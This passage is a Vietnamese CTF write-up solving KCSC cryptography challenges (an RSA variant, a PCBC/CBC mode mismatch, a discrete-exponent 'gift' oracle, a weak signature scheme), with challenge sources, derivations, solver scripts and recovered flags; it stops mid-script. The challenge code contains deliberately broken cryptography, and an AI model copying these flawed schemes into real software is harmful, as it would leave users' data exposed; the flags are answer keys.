  print(long_to_bytes(pow(c, d, n)))



Flag: KCSC{0ne_p_1s_Enough_:vvvvv}
Ngoài cách giải trên ra thì còn một cách khác đơn giản hơn đó là sử dụng Nhị thức Newton
n = p*p*q
phi = p*(p-1)*(q-1)
h = d^e mod n

e^e*h = (e*d)^e mod n
e^e*h = (e*d)^e mod p
e^e*h = (1 + p*(p-1)*(q-1))^e mod p

khai triển nhị thức newton của (1 + p*(p-1)*(q-1))^e mod p ta được 1
vậy ta được phương trình mới là:
e^e*h = 1 mod p

=> e^e*h - 1 = k*p

=> gcd(e^e*h - 1, n) == p

AESOS (easy/medium)


chal.py
  from Crypto.Util.number import *
  from Crypto.Util.Padding import *
  from aes import *
  import os
  from pwn import xor
  from secret import flag

  cipher = AES(os.urandom(16))

  def encrypt(msg: bytes) -> bytes:
      iv = os.urandom(16)
      return iv + cipher.encrypt(msg, iv)

  def decrypt(c: bytes) -> bytes:
      return cipher.decrypt(c[16:], c[:16])

  while True:

      print("1. Encrypt")
      print("2. Decrypt")
      print("3. Flag")

      otp = int(input(">> "))

      if otp == 1:

          msg = bytes.fromhex(input("Enter your message: "))
          print(encrypt(msg).hex())

      elif otp == 2:

          msg = bytes.fromhex(input("Enter the ciphertext: "))
          print(decrypt(msg).hex())

      elif otp == 3:

          print(encrypt(flag).hex())

      else:
          exit()



aes.py
#!/usr/bin/env python3
"""
This is an exercise in secure symmetric-key encryption, implemented in pure
Python (no external libraries needed).

Original AES-128 implementation by Bo Zhu (http://about.bozhu.me) at 
https://github.com/bozhu/AES-Python . PKCS#7 padding, CBC mode, PKBDF2, HMAC,
byte array and string support added by me at https://github.com/boppreh/aes. 
Other block modes contributed by @righthandabacus.


Although this is an exercise, the `encrypt` and `decrypt` functions should
provide reasonable security to encrypted messages.
"""


s_box = (
    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
)

inv_s_box = (
    0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB,
    0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB,
    0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E,
    0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25,
    0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92,
    0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84,
    0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06,
    0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B,
    0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73,
    0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E,
    0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B,
    0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4,
    0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F,
    0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF,
    0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61,
    0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D,
)


def sub_bytes(s):
    for i in range(4):
        for j in range(4):
            s[i][j] = s_box[s[i][j]]


def inv_sub_bytes(s):
    for i in range(4):
        for j in range(4):
            s[i][j] = inv_s_box[s[i][j]]


def shift_rows(s):
    s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]
    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
    s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]


def inv_shift_rows(s):
    s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]
    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]
    s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3]

def add_round_key(s, k):
    for i in range(4):
        for j in range(4):
            s[i][j] ^= k[i][j]


# learned from https://web.archive.org/web/20100626212235/http://cs.ucsb.edu/~koc/cs178/projects/JT/aes.c
xtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)


def mix_single_column(a):
    # see Sec 4.1.2 in The Design of Rijndael
    t = a[0] ^ a[1] ^ a[2] ^ a[3]
    u = a[0]
    a[0] ^= t ^ xtime(a[0] ^ a[1])
    a[1] ^= t ^ xtime(a[1] ^ a[2])
    a[2] ^= t ^ xtime(a[2] ^ a[3])
    a[3] ^= t ^ xtime(a[3] ^ u)


def mix_columns(s):
    for i in range(4):
        mix_single_column(s[i])


def inv_mix_columns(s):
    # see Sec 4.1.3 in The Design of Rijndael
    for i in range(4):
        u = xtime(xtime(s[i][0] ^ s[i][2]))
        v = xtime(xtime(s[i][1] ^ s[i][3]))
        s[i][0] ^= u
        s[i][1] ^= v
        s[i][2] ^= u
        s[i][3] ^= v

    mix_columns(s)


r_con = (
    0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
    0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,
    0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,
    0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,
)


def bytes2matrix(text):
    """ Converts a 16-byte array into a 4x4 matrix.  """
    return [list(text[i:i+4]) for i in range(0, len(text), 4)]

def matrix2bytes(matrix):
    """ Converts a 4x4 matrix into a 16-byte array.  """
    return bytes(sum(matrix, []))

def xor_bytes(a, b):
    """ Returns a new byte array with the elements xor'ed. """
    return bytes(i^j for i, j in zip(a, b))

def inc_bytes(a):
    """ Returns a new byte array with the value increment by 1 """
    out = list(a)
    for i in reversed(range(len(out))):
        if out[i] == 0xFF:
            out[i] = 0
        else:
            out[i] += 1
            break
    return bytes(out)

def pad(plaintext):
    """
    Pads the given plaintext with PKCS#7 padding to a multiple of 16 bytes.
    Note that if the plaintext size is a multiple of 16,
    a whole block will be added.
    """
    padding_len = 16 - (len(plaintext) % 16)
    padding = bytes([padding_len] * padding_len)
    return plaintext + padding

def unpad(plaintext):
    """
    Removes a PKCS#7 padding, returning the unpadded text and ensuring the
    padding was correct.
    """
    padding_len = plaintext[-1]
    assert padding_len > 0
    message, padding = plaintext[:-padding_len], plaintext[-padding_len:]
    assert all(p == padding_len for p in padding)
    return message

def split_blocks(message, block_size=16, require_padding=True):
        assert len(message) % block_size == 0 or not require_padding
        return [message[i:i+16] for i in range(0, len(message), block_size)]


class AES:
    """
    Class for AES-128 encryption with CBC mode and PKCS#7.

    This is a raw implementation of AES, without key stretching or IV
    management. Unless you need that, please use `encrypt` and `decrypt`.
    """
    rounds_by_key_size = {16: 10, 24: 12, 32: 14}
    def __init__(self, master_key):
        """
        Initializes the object with a given key.
        """
        assert len(master_key) in AES.rounds_by_key_size
        self.n_rounds = AES.rounds_by_key_size[len(master_key)]
        self._key_matrices = self._expand_key(master_key)

    def _expand_key(self, master_key):
        """
        Expands and returns a list of key matrices for the given master_key.
        """
        # Initialize round keys with raw key material.
        key_columns = bytes2matrix(master_key)
        iteration_size = len(master_key) // 4

        i = 1
        while len(key_columns) < (self.n_rounds + 1) * 4:
            # Copy previous word.
            word = list(key_columns[-1])

            # Perform schedule_core once every "row".
            if len(key_columns) % iteration_size == 0:
                # Circular shift.
                word.append(word.pop(0))
                # Map to S-BOX.
                word = [s_box[b] for b in word]
                # XOR with first byte of R-CON, since the others bytes of R-CON are 0.
                word[0] ^= r_con[i]
                i += 1
            elif len(master_key) == 32 and len(key_columns) % iteration_size == 4:
                # Run word through S-box in the fourth iteration when using a
                # 256-bit key.
                word = [s_box[b] for b in word]

            # XOR with equivalent word from previous iteration.
            word = xor_bytes(word, key_columns[-iteration_size])
            key_columns.append(word)

        # Group key words in 4x4 byte matrices.
        return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]

    def encrypt_block(self, plaintext):
        assert len(plaintext) == 16

        plain_state = bytes2matrix(plaintext)

        add_round_key(plain_state, self._key_matrices[0])

        for i in range(1, self.n_rounds):
            sub_bytes(plain_state)
            shift_rows(plain_state)
            mix_columns(plain_state)
            add_round_key(plain_state, self._key_matrices[i])

        sub_bytes(plain_state)
        shift_rows(plain_state)
        add_round_key(plain_state, self._key_matrices[-1])

        return matrix2bytes(plain_state)

    def decrypt_block(self, ciphertext):
        assert len(ciphertext) == 16

        cipher_state = bytes2matrix(ciphertext)

        add_round_key(cipher_state, self._key_matrices[-1])
        inv_shift_rows(cipher_state)
        inv_sub_bytes(cipher_state)

        for i in range(self.n_rounds - 1, 0, -1):
            add_round_key(cipher_state, self._key_matrices[i])
            inv_mix_columns(cipher_state)
            inv_shift_rows(cipher_state)
            inv_sub_bytes(cipher_state)

        add_round_key(cipher_state, self._key_matrices[0])

        return matrix2bytes(cipher_state)

    def encrypt(self, plaintext, iv):
        assert len(iv) == 16
        plaintext = pad(plaintext)
        blocks = []
        prev_ciphertext = iv
        prev_plaintext = bytes(16)
        for plaintext_block in split_blocks(plaintext):
            ciphertext_block = self.encrypt_block(xor_bytes(plaintext_block, xor_bytes(prev_ciphertext, prev_plaintext)))
            blocks.append(ciphertext_block)
            prev_ciphertext = ciphertext_block
            prev_plaintext = plaintext_block
        return b''.join(blocks)

    def decrypt(self, ciphertext, iv):
        assert len(iv) == 16
        blocks = []
        previous = iv
        for ciphertext_block in split_blocks(ciphertext):
            blocks.append(xor_bytes(previous, self.decrypt_block(ciphertext_block)))
            previous = ciphertext_block
        return b''.join(blocks)


Ngồi phân tích file chal.py thì thấy nó khá bình thường, có hàm encrypt plaintext, có hàm decrypt để giải mã ciphertext và có cả option để trả về ciphertext của Flag.

Mình thử bỏ Flag hàm decrypt thử thì như dự đoán là nó không trả về toàn bộ Flag mà chỉ có 16 bytes đầu của Flag là đúng, nên chắc chắc là hàm encrypt hoặc hàm decrypt có vấn đề. Nên chúng ta tiến hành đi khám file aes.py.

Phân tích hai hàm encrypt() và decrypt() của file aes.py:
  def encrypt(self, plaintext, iv):
      assert len(iv) == 16
      plaintext = pad(plaintext)
      blocks = []
      prev_ciphertext = iv
      prev_plaintext = bytes(16)
      for plaintext_block in split_blocks(plaintext):
          ciphertext_block = self.encrypt_block(xor_bytes(plaintext_block, xor_bytes(prev_ciphertext, prev_plaintext)))
          blocks.append(ciphertext_block)
          prev_ciphertext = ciphertext_block
          prev_plaintext = plaintext_block
      return b''.join(blocks)

  def decrypt(self, ciphertext, iv):
      assert len(iv) == 16
      blocks = []
      previous = iv
      for ciphertext_block in split_blocks(ciphertext):
          blocks.append(xor_bytes(previous, self.decrypt_block(ciphertext_block)))
          previous = ciphertext_block
      return b''.join(blocks)


Nhận thấy rằng Flag của ta được encrypt bằng mode PCBC nhưng hàm decrypt lại là mode CBC nên khi ta đưa ciphertext vào thì chỉ có 16 bytes đầu tiên của plaintext là đúng.
  

Vì hàm decrypt là mode CBC nên nó đã có bước ⊕ với IV (ciphertxt trước đó), để biến hàm decrypt thành mode PCBC thì thứ còn thiếu là ⊕ với plaintext trước đó thôi.

Nhận Ciphertext của Flag (option 3):
  bd1f37f09f2d51f0af5526862aacaa49978c6ec9d8ff8a1f1da21641fab8d49f45fd3bf409c2bfe61c7dba5b43e32e4618daf4c150a8962bf416fac9f58e6359abc1da5949259468ee2d1cfc3a043eee7abf310cc158078f6a42f59f70d1671cfa3969b1f99422a520bafd676941422787a6f96d5ee3c860f3638f87c77426ae48f8af7a9a64f3fc7759140ba9a44b7675509036cc976e35dcd4ad86caeb21cd100996b444a688608c3563e859fc2fc69054af99a0221e138b3b0ab449e01f62668f47531d396d5fc5cd972e2fe14c0413045fc349435789b6823e2645424157e4f556349f810b5c3937150b8b55b70077cc8713baecceabe1037cd1f56b9ee45a654528c87c3cf093e79dbdb0769652a20c88ec8a781381cebf3a766f5be2a2c67d48c7b1096e39818ea7e54d98cdec413073351bffcaaa6fd741a1106bc7798d81d6f0efc4eb8a3f5dbe474f19c01af6225dbd2746e800ce15a61ef086df12ee4c89a9b92505802a68d29f669611eab805bd7620ae57d7ee4b23cfd5b4b44014487aa3a8abab03435bf0399041a958c9b1f39643926554f4b816868d3df0d2d52dbdfee5fe9d0221cbc2a4665ccaa7a378f7e4155b2244adb189a1e966c2021aab4d7ac67b77c4e95ba05ac9c58d2f27e927530cb62d32c018c2fa3ab07360734aa6b29582b744fd53c8a556b75781d208e994e7022d8752687431175f79e4e139c3da765cbd79c400fa6f7fad47d41c42ab414dcc1de485e269d86c29112a55bfffaf8e4fd7aa9e7dec7a8d06d5b6ed4840772c2fd281ad2f6e893bf1132d5c01e92823abe29bdac8379806aafb869584b4e1c1b6ccb32f8405d580a84868


Sau đó đưa qua hàm decrypt (option 2), ta được output giải mã bằng CBC như sau:
  4b4353437b50726f7061676174696e6714203a3313350030120d08021f360d0f3e0a071906022d77322f2d20420b0b0d3e191c061e063849242a2c247637011537150030120d08021f360d0f3e0a071906022d3010331f0f0a360d1c04111a360d0e2f07172d5d0e0d060d1f3a1b1c3e0a07190602291f5431300e043b063716081d360a02285b51333a0930100a001400062c013a00040602093b3c1c0e310404062c0c312c190909333c0a18090b151116271d312b1b37152d0c19110f0406113a111a3b1109361e1b1b150d1e3e030d3a07310000051b1719000c021e73280916312801090f2d18032b1e06024200041d3c051c1c18360f147128210b310f262c202d141f100c42384b3e2a0600322f2d20343200023a5c3304080d1c3a1a18300a180037290d15083e1e07000d2716301d1b002c27373a142d121f1d072a113004043e1d06113a08063a140500161800110205361a1c0027042d071a060c1e2c3e0d0d2f1c0d172b150a11290b031a10343c0b150e0a00113a1a11360c0b3006053c101c161b1701713d29000502001207171a263336263b4330280c473a3e19361d0636372b22330415051145300f31290c0d1d1b1b3e051a2514070c0b3136183a171c0a2d3900012c012c0708300a05712b3d0b330f02172c371d214030070e4d2d2c1e18000502001301016f00130c171a26041c0c310e31332c30313a141d2b21092b400c31001a0a0e1e1b1f0200362638005e0c0d1d1b1b48330a1b14070c1c313e1a093c16031d4a34103e1a153a03330005022b07141b3c1f1c000d03001303131b1b041156095c776c


Sau đó tiến hành ⊕ block hiện tại (bắt đầu từ block 2 vì block 1 đã đúng rồi) với plaintext trước đó và lặp lại đến hết tất cả các khối của output là ta sẽ có được Flag ban đầu:

Script:
  from pwn import xor

  ct = bytes.fromhex("4b4353437b50726f7061676174696e6714203a3313350030120d08021f360d0f3e0a071906022d77322f2d20420b0b0d3e191c061e063849242a2c247637011537150030120d08021f360d0f3e0a071906022d3010331f0f0a360d1c04111a360d0e2f07172d5d0e0d060d1f3a1b1c3e0a07190602291f5431300e043b063716081d360a02285b51333a0930100a001400062c013a00040602093b3c1c0e310404062c0c312c190909333c0a18090b151116271d312b1b37152d0c19110f0406113a111a3b1109361e1b1b150d1e3e030d3a07310000051b1719000c021e73280916312801090f2d18032b1e06024200041d3c051c1c18360f147128210b310f262c202d141f100c42384b3e2a0600322f2d20343200023a5c3304080d1c3a1a18300a180037290d15083e1e07000d2716301d1b002c27373a142d121f1d072a113004043e1d06113a08063a140500161800110205361a1c0027042d071a060c1e2c3e0d0d2f1c0d172b150a11290b031a10343c0b150e0a00113a1a11360c0b3006053c101c161b1701713d29000502001207171a263336263b4330280c473a3e19361d0636372b22330415051145300f31290c0d1d1b1b3e051a2514070c0b3136183a171c0a2d3900012c012c0708300a05712b3d0b330f02172c371d214030070e4d2d2c1e18000502001301016f00130c171a26041c0c310e31332c30313a141d2b21092b400c31001a0a0e1e1b1f0200362638005e0c0d1d1b1b48330a1b14070c1c313e1a093c16031d4a34103e1a153a03330005022b07141b3c1f1c000d03001303131b1b041156095c776c")

  # 4b4353437b50726f7061676174696e67 là KCSC{Propagating
  flag = ct[:16]
  current_xor = ct[:16]

  # bỏ khối đầu tiên
  for i in range(16, len(ct), 16):
      current_xor = xor(current_xor, ct[i:i+16])
      flag += current_xor

  print(flag)
  # b'KCSC{Propagating_cipher_block_chaining_(PCBC)The_propagating_cipher_block_chaining_or_plaintext_cipher-block_chaining[26]_mode_was_designed_to_cause_small_changes_in_the_ciphertext_to_propagate_indefinitely_when_decrypting,_as_well_as_when_encrypting._In_PCBC_mode,_each_block_of_plaintext_is_XORed_with_both_the_previous_plaintext_block_and_the_previous_ciphertext_block_before_being_encrypted._Like_with_CBC_mode,_an_initialization_vector_is_used_in_the_first_block._Unlike_CBC,_decrypting_PCBC_with_the_incorrect_IV_(initialization_vector)_causes_all_blocks_of_plaintext_to_be_corrupt.}\x03\x03\x03'



vem (medium)


Source:

    from Crypto.Util.number import getPrime, bytes_to_long, long_to_bytes
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad
    import random
    from secret import FLAG
    FLAG = b'KCSC{?????????????????????????????????????????}'

    G = getPrime(256)
    p = getPrime(512)
    q = getPrime(512)
    N = p*q


    b, c = [random.randint(0, 2**64) for _ in range(2)]

    def P_x(x):
        return x**2 + b * x + c

    def gift(a):
        return pow(G, P_x(a), N)

    def encrypt_message(msg, key):
        cipher = AES.new(key, AES.MODE_ECB)
        return cipher.encrypt(msg).hex()

    MSG1 = bytes_to_long(b"Make KCSC")
    MSG2 = bytes_to_long(b"Great Again")

    options = """
    1. Get gift
    2. Flag
    """

    print("I want to see you in KCSC")
    print(f"N = {N}")
    print(f'P(x) = x^2 + bx + {c}')
    print('pay for g :)))))')
    print("Choose your option")
    print(options)

    for _ in range(5):
        try:
            option = int(input('> '))

            if option == 1:
                msg = int(input('Give me your msg: '))
                print(f'Your gift: {gift(msg)}')

            elif option == 2:
                key = pow(G, 2*MSG1 * MSG2, N)
                enc_flag = encrypt_message(pad(FLAG, 16), long_to_bytes(key)[:32])
                print(f'Here is your enc_flag: {enc_flag}')

            else:
                print('Invalid option :((')
                exit()

        except Exception as e:
            print('Error occurred :((')
            exit()


Phân tích Source ta thấy rằng key được mã hóa bằng cách tính pow(G, 2*MSG1 * MSG2, N), với giá trị MSG1 và MSG2 đã có, mục tiêu của ta là tìm được G

Challenge cũng cho ta nhập vào một giá trị x bất kì để tính giá trị của Gift, trong đó:


$$\text{Gift} \equiv G^{x^2 + bx + c} \pmod N$$

Vì thế ta sẽ lợi dụng giá trị x này để tính lại giá trị \(G\) ban đầu.

Challenge chưa cho ta giá trị b nên ta sẽ tìm cách để triệt tiêu nó. Đầu tiên ta gửi ba giá trị x là -1, 1 và 0, được ba kết quả như sau:


$$\begin{gather} \text{Gift}_{-1} = \text{G}^{-b + c + 1} \newline \text{Gift}_1 =\text{G}^{b +c + 1} \newline \text{Gift}_0 = \text{G}^{c} \end{gather}$$

Lấy \(\text{Gift}_{-1}\) nhân với \(\text{Gift}_1\) được:

$$\text{G}^{-b + c + 1} \times \text{G}^{b +c + 1} = \text{G}^{2c + 2} = \text{G}^{2c} \times \text{G}^{2} = \text{Gift}_0^2 \times \text{G}^{2}$$

Vậy ta tính được giá trị của \(\text{G}^{2}\) là:

$$\text{G}^{2} \equiv \text{Gift}_{-1} \times \text{Gift}_1 \times \text{Gift}_0^{-2} \pmod N$$

Vì \(\text{G}\) chỉ lớn 256 bit nên \(\text{G}^{2}\) sẽ bé hơn N (1024 bit), ta chỉ cần tính căn bậc hai của \(\text{G}^{2}\) trên trường số thực là sẽ có được \(\text{G}\).

Script:
  from Crypto.Util.number import *
  from Crypto.Cipher import AES
  from Crypto.Util.Padding import pad
  from gmpy2 import iroot

  g0 = 68709246753718708670434009468603812974169730880153372110182606027552206350317791358757202779168733600759215556114409595644777258807639505704788072606532821696532807121688324431031050041320682016561540194647870403534914783447479491524407581399830011189381812922803275186625229630192946937561415007763234855418
  g1 = 34912588211485487865266218601704066950383917642724347506083898462113941064077455705169681005963342375593688421399108198203498076409644237969447450208571854706415271918417061971940103387042750662416626209121400964110421639401854909795659178421492644182031211590672462202637945253500739318723159856916161975048
  g_1 = 11186741340123775362088539391154861118292423476007589818009758364041151686393407198862771587531612692555053653337196730852015297901445970353774615829133233790769710578342099928560157910124055319112487021351081043889989246091356061788284924405098962070739530308884383115967974725358199407010468585449409245067
  N = 106204527447305751846882251060475772730437136941185872213298995208525994414059793295374996918284654725292034949561262467748493471889227649964473617275415214227226870761256042534830419906951817128862859251725033489046287902825423970540811544802157468312878182813317947896749764084503149466587697826296781850847
  ct = bytes.fromhex("6eef3cb780a4caae1efc2ad63a78f3709f73957299908d8992cad9de3ddb081a7fab79e52816f10ce689a6c645965fba44ce2b2ddba4d0e51a222b062b4b97c9")

  MSG1 = bytes_to_long(b"Make KCSC")
  MSG2 = bytes_to_long(b"Great Again")

  G2 = (g1 * g_1 * pow(g0, -2, N)) % N
  G = iroot(G2, 2)[0]

  key = long_to_bytes(pow(G, 2*MSG1 * MSG2, N))[:32]

  cipher = AES.new(key, AES.MODE_ECB)
  print(cipher.decrypt(ct))



Flag: KCSC{Congr4tulati0n_to_you_0n_5olving_chall_lor:)))}
Simple lath (medium)


Source:

    from hashlib import sha256
    from Crypto.Util.number import bytes_to_long , getPrime
    from math import prod
    from random import choice ,randint
    from secret import  *

    array = [i for i in range(1,1000,2)]
    n = prod([i for i in array if choice([0,1])])


    def sha256_(plaintext) :
        return bytes_to_long(sha256(plaintext).digest())

    def sign(x,m,g) :

        k = randint(1,2**18)
        r = pow(g,k,n)
        s = ((m-x*r)*k)%n

        return r,s,get_chances(k,n) # from secret

    def main() :

        print("Welcom to my easy sign channel")
        print("Can you guess my  private key ???")
        private_key = randint(2**32,2**128)
        print(f'Public key : {hex(n)}')


        while True : 

            g = getPrime(128)
            plaintext =  bytes.fromhex(input("Input your plaintext :  "))
            m = sha256_(plaintext)
            while True : 

                r,s ,num_rounds = sign(private_key,m,g)
                if num_rounds > 150 and num_rounds < 999:
                    break

            print(f'g : {hex(g)}')
            print(f'r : {hex(r)}')
            print(f's : {hex(s)}')

            inp = int(input("Do you want sign more (0/1)  "))
            if inp == 0 :
                break

        print(f'You have {num_rounds} chances ~.~  ')
        for _ in range(num_rounds) :

            private_user = int(input(f'Submit you private key : '))
            if private_user == private_key : 
                print(f'Here is your flag , cheater : {flag}')
                exit()

        print(f'Did you get what you wanted? ')
        print(f'If not, here is my gift for your : {f1ag}')

    main()


Quan sát source, ta biết rằng để có Flag thì phải gửi cho server giá trị đúng của khóa bí mật d, ta có công thức của khóa bí mật d như sau:

$$s \equiv ((m-d\times r)\times k) \pmod n \hspace{3mm} (1)$$
$$\Leftrightarrow d \times k \equiv (s - m \times k) \times (-r)^{-1} \pmod n \hspace{3mm} (2)$$

Lý do mình không nhân hai vế phương trình \((1)\) cho \(k^{-1}\) là vì \(n\) có rất nhiều ước, nên giá trị \(\text{GCD(k, n)}\) thường không phải 1 nên không thể triệt tiêu \(k\) được.

Giờ ta có phương trình \((2)\) là phương trình linear Congruence, tức là phương trình dạng \(A \times x \equiv B \pmod N\), nói sơ qua thì phương trình này có nghiệm khi và chỉ khi \(B\) chia hết cho \(\text{GCD(A, N)}\).

Bổ sung thêm là phương trình \(A \times x \equiv B \pmod N\) có 1 nghiệm khi \(\text{GCD(A, N) = 1}\), và có \(K\) nghiệm khi \(\text{GCD(A, N) = K}\), có thể xem cách giải ở đây. Ở Challenge này thì \(\text{GCD(A, N)}\) thường khác 1 nên phương trình sẽ có kha khá nghiệm.

Quay trở lại với Challenge thì phương trình \((2)\) của ta chưa có giá trị \(k\) vì vậy ta sẽ tiến hành brute force \(k\) để tìm lại giá trị \(k\) ban đầu của server. Mình thấy rằng trong \(\text{GCD(k, N)}\) nghiệm của phương trình \((2)\) thì tất cả đều cho số rất lớn (xấp xỉ giá trị bit của n) trừ giá trị \(d\) vì nó vẫn có kích thước 128 bit.


  Vì thế khi ta brute force trúng giá trị \(k\) của Challenge thì ta sẽ lọc ra trong \(\text{GCD(k, N)}\) nghiệm đó giá trị nào 128 bit thì đó sẽ là giá trị \(d\) của ta. Có \(d\) thì gửi cho server và bài toán kết thúc.

Script:


    from Crypto.Util.number import GCD
    from tqdm import trange

    # nhận các tham số của Challenge, m là hash của 01
    n = 0x255601e1de9c4aa1c5d7ed41d6ba8084c3a4f9f18169ce7dfed3833f787cbed3ec7cc2225d0f6b49f0fe28b2fd159105f513a10013696501e487ac6221b6dd8fc45b8fc313608227c381430524a27301c90751d616d52d4b720400994d8bde35703207f22cdf18f8f89e17c8421daef31e43f1ae99a77687c25dee9405a4c205dace678a9b2de1d49b818e7b78cb68bafbd48d4c781d6b98bac90e002c08f8c578aceff78c4296deb7aa6e3a03a8790813b27b67b33288a2998adc24c3b0c7f14da0c00b9ff397463c5a2f64e98688635a344ab0f3b2795e20f8ff1e53c6f82f72a14ccca3182a2146919bde3a6b169342b0fb6be1632286d4e1070dcf4e6b0f
    m = 34356466678672179216206944866734405838331831190171667647615530531663699592602
    g = 0x902bf7a457553a6244bd9389ac2b48b9
